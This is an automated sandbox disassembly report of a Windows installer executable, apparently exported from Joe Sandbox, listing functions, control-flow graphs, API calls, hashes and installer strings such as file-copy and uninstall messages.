                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$UF$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                          • API String ID: 0-843965562
                                                                          • Opcode ID: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
                                                                          • Instruction ID: 2c976b8502b68867d0ce509d0e418c852ac65d8e3c14b9799468bf735a09a243
                                                                          • Opcode Fuzzy Hash: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
                                                                          • Instruction Fuzzy Hash: A5926430E042489FCB11DFA5C495BEDBBB5AF09304F5440ABE844AB392E7789E45CF5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00423B7C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1557 423b7c-423bb0 1558 423bb2-423bb3 1557->1558 1559 423be4-423bfb call 423ad8 1557->1559 1561 423bb5-423bd1 call 40b3ac 1558->1561 1565 423c5c-423c61 1559->1565 1566 423bfd 1559->1566 1584 423bd3-423bdb 1561->1584 1585 423be0-423be2 1561->1585 1567 423c63 1565->1567 1568 423c97-423c9c 1565->1568 1569 423c03-423c06 1566->1569 1570 423cc0-423cd0 1566->1570 1574 423f21-423f29 1567->1574 1575 423c69-423c71 1567->1575 1578 423ca2-423ca5 1568->1578 1579 42400a-424018 IsIconic 1568->1579 1576 423c35-423c38 1569->1576 1577 423c08 1569->1577 1572 423cd2-423cd7 1570->1572 1573 423cdb-423ce3 call 424104 1570->1573 1586 423ce8-423cf0 call 42414c 1572->1586 1587 423cd9-423cfc call 423af4 1572->1587 1580 4240c2-4240ca 1573->1580 1574->1580 1581 423f2f-423f3a call 418150 1574->1581 1589 423e83-423eaa SendMessageA 1575->1589 1590 423c77-423c7c 1575->1590 1582 423d19-423d20 1576->1582 1583 423c3e-423c3f 1576->1583 1592 423d66-423d76 call 423af4 1577->1592 1593 423c0e-423c11 1577->1593 1594 424046-42405b call 4247c0 1578->1594 1595 423cab-423cac 1578->1595 1579->1580 1591 42401e-424029 GetFocus 1579->1591 1596 4240e1-4240e7 1580->1596 1581->1580 1645 423f40-423f4f call 418150 IsWindowEnabled 1581->1645 1582->1580 1605 423d26-423d2d 1582->1605 1606 423c45-423c48 1583->1606 1607 423eaf-423eb6 1583->1607 1584->1596 1585->1559 1585->1561 1586->1580 1587->1580 1589->1580 1608 423c82-423c83 1590->1608 1609 423fba-423fc5 1590->1609 1591->1580 1600 42402f-424038 call 41ef64 1591->1600 1592->1580 1601 423c17-423c1a 1593->1601 1602 423d8e-423daa PostMessageA call 423af4 1593->1602 1594->1580 1611 423cb2-423cb5 1595->1611 1612 42405d-424064 1595->1612 1600->1580 1658 42403e-424044 SetFocus 1600->1658 1621 423c20-423c23 1601->1621 1622 423e15-423e1c 1601->1622 1602->1580 1605->1580 1627 423d33-423d39 1605->1627 1628 423c4e-423c51 1606->1628 1629 423daf-423dcf call 423af4 1606->1629 1607->1580 1617 423ebc-423ec1 call 404e54 1607->1617 1630 423fe2-423fed 1608->1630 1631 423c89-423c8c 1608->1631 1609->1580 1613 423fcb-423fdd 1609->1613 1614 424090-424097 1611->1614 1615 423cbb 1611->1615 1624 424066-424079 call 424444 1612->1624 1625 42407b-42408e call 42449c 1612->1625 1613->1580 1649 4240aa-4240b9 1614->1649 1650 424099-4240a8 1614->1650 1633 4240bb-4240bc call 423af4 1615->1633 1617->1580 1640 423c29-423c2a 1621->1640 1641 423d3e-423d4c IsIconic 1621->1641 1642 423e1e-423e31 call 423a84 1622->1642 1643 423e4f-423e60 call 423af4 1622->1643 1624->1580 1625->1580 1627->1580 1646 423c57 1628->1646 1647 423d7b-423d89 call 4240e8 1628->1647 1672 423df3-423e10 call 4239f4 PostMessageA 1629->1672 1673 423dd1-423dee call 423a84 PostMessageA 1629->1673 1630->1580 1634 423ff3-424005 1630->1634 1651 423c92 1631->1651 1652 423ec6-423ece 1631->1652 1681 4240c1 1633->1681 1634->1580 1659 423c30 1640->1659 1660 423d01-423d09 1640->1660 1666 423d5a-423d61 call 423af4 1641->1666 1667 423d4e-423d55 call 423b30 1641->1667 1686 423e43-423e4a call 423af4 1642->1686 1687 423e33-423e3d call 41eec8 1642->1687 1691 423e62-423e68 call 41ee14 1643->1691 1692 423e76-423e7e call 4239f4 1643->1692 1645->1580 1688 423f55-423f64 call 418150 IsWindowVisible 1645->1688 1646->1633 1647->1580 1649->1580 1650->1580 1651->1633 1652->1580 1657 423ed4-423edb 1652->1657 1657->1580 1674 423ee1-423ef0 call 418150 IsWindowEnabled 1657->1674 1658->1580 1659->1633 1660->1580 1675 423d0f-423d14 call 422bbc 1660->1675 1666->1580 1667->1580 1672->1580 1673->1580 1674->1580 1703 423ef6-423f0c call 412280 1674->1703 1675->1580 1681->1580 1686->1580 1687->1686 1688->1580 1709 423f6a-423fb5 GetFocus call 418150 SetFocus call 4151b0 SetFocus 1688->1709 1707 423e6d-423e70 1691->1707 1692->1580 1703->1580 1712 423f12-423f1c 1703->1712 1707->1692 1709->1580 1712->1580
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                          • Instruction ID: 7115e30b2d35316c82e91109ae6d6d6b504554527cf119b6ec0a5d38efd5eaef
                                                                          • Opcode Fuzzy Hash: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                          • Instruction Fuzzy Hash: 88E19A30B00124EBC710DF69E585A5EB7B0FF48704FA441AAE645AB352CB7DEE81DB09
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004637D4 Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1645windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1924 4637d4-4637ea 1925 4637f4-4638ab call 48f6b4 call 402b30 * 6 1924->1925 1926 4637ec-4637ef call 402d30 1924->1926 1943 4638ad-4638d4 call 4145ac 1925->1943 1944 4638e8-463901 1925->1944 1926->1925 1950 4638d6 1943->1950 1951 4638d9-4638e3 call 41456c 1943->1951 1948 463903-46392a call 41458c 1944->1948 1949 46393e-46394c call 48f994 1944->1949 1957 46392f-463939 call 41454c 1948->1957 1958 46392c 1948->1958 1959 46394e-46395d call 48f804 1949->1959 1960 46395f-463961 call 48f928 1949->1960 1950->1951 1951->1944 1957->1949 1958->1957 1965 463966-4639b9 call 48f318 call 41a340 * 2 1959->1965 1960->1965 1972 4639ca-4639df call 4508e0 call 414a88 1965->1972 1973 4639bb-4639c8 call 414a88 1965->1973 1979 4639e4-4639eb 1972->1979 1973->1979 1980 463a33-463eb9 call 48f754 call 48fa50 call 41458c * 3 call 41462c call 41454c * 3 call 45d190 call 45d1a8 call 45d1b4 call 45d1fc call 45d190 call 45d1a8 call 45d1b4 call 45d1fc call 45d1a8 call 45d1fc LoadBitmapA call 41d620 call 45d1cc call 45d1e4 call 463630 call 4650b4 call 462cac call 40357c call 414a88 call 462fe4 call 462fec call 462cac call 40357c * 2 call 414a88 call 4650b4 call 462cac call 414a88 call 462fe4 call 462fec call 414a88 * 2 call 4650b4 call 414a88 * 2 call 462fe4 call 41456c call 462fe4 call 41456c call 4650b4 call 414a88 call 462fe4 call 462fec call 4650b4 call 414a88 call 462fe4 call 41456c * 2 call 414a88 call 462fe4 call 41456c 1979->1980 1981 4639ed-463a2e call 41462c call 414670 call 420f08 call 420f34 call 420ad8 call 420b04 1979->1981 2111 463f15-463f2e call 4149b4 * 2 1980->2111 2112 463ebb-463f13 call 41456c call 414a88 call 462fe4 call 41456c 1980->2112 1981->1980 2119 463f33-463fe4 call 462cac call 4650b4 call 462cac call 414a88 call 48fa50 call 462fe4 2111->2119 2112->2119 2138 463fe6-464001 2119->2138 2139 46401e-464242 call 462cac call 414a88 call 48fa60 * 2 call 42e668 call 41456c call 462fe4 call 41456c call 414a88 call 48f754 call 48fa50 call 41458c call 462cac call 414a88 call 462fe4 call 41456c call 462cac call 4650b4 call 462cac call 414a88 call 462fe4 call 41456c call 462fec call 462cac call 414a88 call 462fe4 2119->2139 2140 464006-464019 call 41456c 2138->2140 2141 464003 2138->2141 2196 464244-46424d 2139->2196 2197 464283-46433c call 462cac call 4650b4 call 462cac call 414a88 call 48fa50 call 462fe4 2139->2197 2140->2139 2141->2140 2196->2197 2199 46424f-46427e call 4149b4 call 462fec 2196->2199 2215 464376-464797 call 462cac call 414a88 call 48fa60 * 2 call 42e668 call 41456c call 462fe4 call 41456c call 414a88 call 48f754 call 48fa50 call 41458c call 414a88 call 462cac call 4650b4 call 462cac call 414a88 call 462fe4 call 462fec call 42bb40 call 48fa60 call 44e144 call 462cac call 4650b4 call 462cac call 4650b4 call 462cac call 4650b4 * 2 call 414a88 call 462fe4 call 462fec call 4650b4 call 48f318 call 41a340 call 462cac call 40357c call 414a88 call 462fe4 call 41456c call 414a88 * 2 call 48fa60 call 403494 call 40357c * 2 call 414a88 2197->2215 2216 46433e-464359 2197->2216 2199->2197 2315 4647bb-4647c2 2215->2315 2316 464799-4647b6 call 44f674 call 44f7d0 2215->2316 2217 46435e-464371 call 41456c 2216->2217 2218 46435b 2216->2218 2217->2215 2218->2217 2318 4647e6-4647ed 2315->2318 2319 4647c4-4647e1 call 44f674 call 44f7d0 2315->2319 2316->2315 2322 464811-464857 call 418150 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4651a8 2318->2322 2323 4647ef-46480c call 44f674 call 44f7d0 2318->2323 2319->2318 2336 464871 2322->2336 2337 464859-464860 2322->2337 2323->2322 2340 464873-464882 2336->2340 2338 464862-46486b 2337->2338 2339 46486d-46486f 2337->2339 2338->2336 2338->2339 2339->2340 2341 464884-46488b 2340->2341 2342 46489c 2340->2342 2343 46488d-464896 2341->2343 2344 464898-46489a 2341->2344 2345 46489e-4648b8 2342->2345 2343->2342 2343->2344 2344->2345 2346 464961-464968 2345->2346 2347 4648be-4648c7 2345->2347 2350 46496e-464991 call 476f14 call 403450 2346->2350 2351 4649fc-464a0a call 414a88 2346->2351 2348 464922-46495c call 414a88 * 3 2347->2348 2349 4648c9-464920 call 476f14 call 414a88 call 476f14 call 414a88 call 476f14 call 414a88 2347->2349 2348->2346 2349->2346 2374 4649a3-4649b7 call 403494 2350->2374 2375 464993-4649a1 call 403494 2350->2375 2356 464a0f-464a18 2351->2356 2360 464a1e-464a36 call 429f48 2356->2360 2361 464b28-464b57 call 42b8dc call 44e0d0 2356->2361 2377 464aad-464ab1 2360->2377 2378 464a38-464a3c 2360->2378 2395 464c05-464c09 2361->2395 2396 464b5d-464b61 2361->2396 2391 4649c9-4649fa call 42c6e0 call 42ca9c call 403494 call 414a88 2374->2391 2392 4649b9-4649c4 call 403494 2374->2392 2375->2391 2384 464ab3-464abc 2377->2384 2385 464b01-464b05 2377->2385 2386 464a3e-464a78 call 40b3ac call 476f14 2378->2386 2384->2385 2393 464abe-464ac9 2384->2393 2389 464b07-464b17 call 429fcc 2385->2389 2390 464b19-464b23 call 429fcc 2385->2390 2454 464aa7-464aab 2386->2454 2455 464a7a-464a81 2386->2455 2389->2361 2390->2361 2391->2356 2392->2391 2393->2385 2402 464acb-464acf 2393->2402 2405 464c0b-464c12 2395->2405 2406 464c88-464c8c 2395->2406 2404 464b63-464b75 call 40b3ac 2396->2404 2410 464ad1-464af4 call 40b3ac call 406a2c 2402->2410 2430 464ba7-464bde call 476f14 call 44c3a0 2404->2430 2431 464b77-464ba5 call 476f14 call 44c470 2404->2431 2405->2406 2413 464c14-464c1b 2405->2413 2414 464cf5-464cfe 2406->2414 2415 464c8e-464ca5 call 40b3ac 2406->2415 2463 464af6-464af9 2410->2463 2464 464afb-464aff 2410->2464 2413->2406 2424 464c1d-464c28 2413->2424 2422 464d00-464d18 call 40b3ac call 465e1c 2414->2422 2423 464d1d-464d32 call 463390 call 463108 2414->2423 2436 464ca7-464ce3 call 40b3ac call 465e1c * 2 call 465cbc 2415->2436 2437 464ce5-464cf3 call 465e1c 2415->2437 2422->2423 2470 464d84-464d8e call 4149b4 2423->2470 2471 464d34-464d57 call 429fb0 call 40b3ac 2423->2471 2424->2423 2433 464c2e-464c32 2424->2433 2472 464be3-464be7 2430->2472 2431->2472 2435 464c34-464c4a call 40b3ac 2433->2435 2467 464c4c-464c78 call 429fcc call 465e1c call 465cbc 2435->2467 2468 464c7d-464c81 2435->2468 2436->2423 2437->2423 2454->2377 2454->2386 2455->2454 2465 464a83-464a95 call 406a2c 2455->2465 2463->2385 2464->2385 2464->2410 2465->2454 2483 464a97-464aa1 2465->2483 2467->2423 2468->2435 2482 464c83 2468->2482 2484 464d93-464db2 call 4149b4 2470->2484 2502 464d62-464d71 call 4149b4 2471->2502 2503 464d59-464d60 2471->2503 2480 464bf2-464bf4 2472->2480 2481 464be9-464bf0 2472->2481 2488 464bfb-464bff 2480->2488 2481->2480 2481->2488 2482->2423 2483->2454 2489 464aa3 2483->2489 2498 464db4-464dd7 call 429fb0 call 465f7c 2484->2498 2499 464ddc-464dff call 476f14 call 403450 2484->2499 2488->2395 2488->2404 2489->2454 2498->2499 2517 464e01-464e0a 2499->2517 2518 464e1c-464e25 2499->2518 2502->2484 2503->2502 2507 464d73-464d82 call 4149b4 2503->2507 2507->2484 2517->2518 2519 464e0c-464e1a call 403494 2517->2519 2520 464e27-464e39 call 403684 2518->2520 2521 464e3b-464e4b call 403494 2518->2521 2528 464e5d-464e74 call 414a88 2519->2528 2520->2521 2529 464e4d-464e58 call 403494 2520->2529 2521->2528 2533 464e76-464e7d 2528->2533 2534 464eaa-464eb4 call 4149b4 2528->2534 2529->2528 2535 464e7f-464e88 2533->2535 2536 464e8a-464e94 call 42b054 2533->2536 2540 464eb9-464ede call 403400 * 3 2534->2540 2535->2536 2538 464e99-464ea8 call 4149b4 2535->2538 2536->2538 2538->2540
                                                                          APIs
                                                                            • Part of subcall function 0048F804: GetWindowRect.USER32(00000000), ref: 0048F81A
                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00463BA3
                                                                            • Part of subcall function 0041D620: GetObjectA.GDI32(?,00000018,00463BBD), ref: 0041D64B
                                                                            • Part of subcall function 00463630: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                            • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                            • Part of subcall function 00463630: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                            • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                            • Part of subcall function 00462FEC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                            • Part of subcall function 0048FA60: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0048FA6A
                                                                            • Part of subcall function 0048F754: 73A1A570.USER32(00000000,?,?,?), ref: 0048F776
                                                                            • Part of subcall function 0048F754: SelectObject.GDI32(?,00000000), ref: 0048F79C
                                                                            • Part of subcall function 0048F754: 73A1A480.USER32(00000000,?,0048F7FA,0048F7F3,?,00000000,?,?,?), ref: 0048F7ED
                                                                            • Part of subcall function 0048FA50: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0048FA5A
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02130464,021320B8,?,?,021320E8,?,?,02132138,?), ref: 0046481B
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046482C
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00464844
                                                                            • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                          • String ID: $(Default)$STOPIMAGE
                                                                          • API String ID: 1965080796-770201673
                                                                          • Opcode ID: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                          • Instruction ID: a97045497617a37e73d7fe25ec91c7d2f949ac95d49f9cf5c1555c71fec600f2
                                                                          • Opcode Fuzzy Hash: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                          • Instruction Fuzzy Hash: C9F2D5386005119FCB00EB69D8D9F9973F5BF89304F1542B6E5049B36AD778EC4ACB8A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047A44C Relevance: 9.1, APIs: 6, Instructions: 149fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?,?,00000000), ref: 0047A4AC
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A4F5
                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D), ref: 0047A502
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A54E
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000), ref: 0047A5F7
                                                                          • FindClose.KERNEL32(000000FF,0047A622,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000), ref: 0047A615
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                          • Instruction ID: df6970a490733c3fc08b9eb15c5b52ce16d10e4af30c9d3b25a464b00084d34d
                                                                          • Opcode Fuzzy Hash: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                          • Instruction Fuzzy Hash: FE516F71900648AFCB11EF65CC45ADEB7BCEB88319F1084BAA408E7341D6389F55CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047077C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004707D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708B2
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: unins$unins???.*
                                                                          • API String ID: 3541575487-1009660736
                                                                          • Opcode ID: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                          • Instruction ID: 3fcbdb993abfa6ff85d44bbf729c32bfcaea701f4f0f62c70188b68341c8b9af
                                                                          • Opcode Fuzzy Hash: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                          • Instruction Fuzzy Hash: 57315370A00108DBDB10EB65C885ADEB7A8DF45304F55C0B6E448AB7A2D738DF419B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00447DC0 Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00447F9D), ref: 00447EE0
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00447F61
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 2574300362-0
                                                                          • Opcode ID: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                          • Instruction ID: 0540f09e741ba6bdaccbcd33a6618944dfbf5ea3d39d596ba1fc0c584366e1b5
                                                                          • Opcode Fuzzy Hash: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                          • Instruction Fuzzy Hash: 87514574E04105AFDB00EF95C481AAEB7F9EF44315F1081BBE814BB391DB389E058B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004513E4 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451421
                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451429
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileFindFirstLast
                                                                          • String ID:
                                                                          • API String ID: 873889042-0
                                                                          • Opcode ID: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                          • Instruction ID: e37cade2724d1815d1fa35268cc527e6c5f68d3fdc0659cff19e79a06527a77b
                                                                          • Opcode Fuzzy Hash: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                          • Instruction Fuzzy Hash: AFF04931A00204AB8B10EFA69C4149EF7ECDB4672676086BBFC14E3692DA784D048558
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004084D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                          • Instruction ID: 1ce02aaae6ec4ade8b295bae84213e8e13784b7c216e354617812bc232f4da8b
                                                                          • Opcode Fuzzy Hash: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                          • Instruction Fuzzy Hash: 59E0D87170021467D711E95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE4046ED
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00423AF4 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C1,?,00000000,004240CC), ref: 00423B1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
                                                                          • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                          • Opcode Fuzzy Hash: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
                                                                          • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                          Uniqueness

